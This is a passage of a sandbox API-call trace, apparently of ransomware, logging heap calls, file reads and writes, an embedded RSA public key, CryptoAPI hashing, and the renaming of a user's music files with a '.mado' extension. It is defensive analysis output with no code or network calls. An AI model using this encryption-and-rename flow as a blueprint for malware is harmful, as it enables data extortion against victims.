hHeap=0x2c0000) returned 1 [0204.695] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.695] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.695] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.695] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe418 | out: hHeap=0x2c0000) returned 1 [0204.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe430 | out: hHeap=0x2c0000) returned 1 [0204.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe460 | out: hHeap=0x2c0000) returned 1 [0204.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe460 [0204.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe430 [0204.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe418 [0204.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bb80 [0204.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bc98 [0204.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe430 | out: hHeap=0x2c0000) returned 1 [0204.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe418 | out: hHeap=0x2c0000) returned 1 [0204.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe460 | out: hHeap=0x2c0000) returned 1 [0204.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.696] GetCurrentThreadId () returned 0x600 [0204.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b72290 [0204.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.697] GetCurrentThreadId () returned 0x600 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe460 [0204.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe418 [0204.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe430 [0204.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe400 [0204.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe478 [0204.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe448 [0204.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe490 [0204.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe418 | out: hHeap=0x2c0000) returned 1 [0204.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe418 [0204.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe460 | out: hHeap=0x2c0000) returned 1 [0204.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bb80 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe490 | out: hHeap=0x2c0000) returned 1 [0204.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bdb0 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bec8 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe418 | out: hHeap=0x2c0000) returned 1 [0204.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe448 | out: hHeap=0x2c0000) returned 1 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe478 | out: hHeap=0x2c0000) returned 1 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe430 | out: hHeap=0x2c0000) returned 1 [0204.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe400 | out: hHeap=0x2c0000) returned 1 [0204.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0204.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3e8 | out: hHeap=0x2c0000) returned 1 [0204.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80bb8 | out: hHeap=0x2c0000) returned 1 [0204.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.700] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x17cf3, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x17cf3, lpOverlapped=0x0) returned 1 [0204.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0204.700] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x17cf8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.701] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.701] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.701] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.701] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.701] CloseHandle (hObject=0x63c) returned 1 [0204.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b74b68 [0204.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2b20 | out: hHeap=0x2c0000) returned 1 [0204.703] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TC y_9-Zb7kJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tc y_9-zb7kj.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\TC y_9-Zb7kJ.mp3.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tc y_9-zb7kj.mp3.mado")) returned 1 [0204.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.703] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.704] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc8c1840, ftCreationTime.dwHighDateTime=0x1d5e5a2, ftLastAccessTime.dwLowDateTime=0x579132f0, ftLastAccessTime.dwHighDateTime=0x1d5e375, ftLastWriteTime.dwLowDateTime=0x579132f0, ftLastWriteTime.dwHighDateTime=0x1d5e375, nFileSizeHigh=0x0, nFileSizeLow=0x84d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="u02f.wav", cAlternateFileName="")) returned 1 [0204.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.704] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u02f.wav") returned=".wav" [0204.704] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\u02f.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\u02f.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.705] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=34006) returned 1 [0204.705] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.707] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x84b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.707] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.709] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.709] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x84d6, lpOverlapped=0x0) returned 1 [0204.710] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.710] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.710] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.710] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.711] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.711] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.711] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.711] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.711] GetLastError () returned 0x0 [0204.711] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.711] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.711] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.711] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.711] RtlAllocateHeap 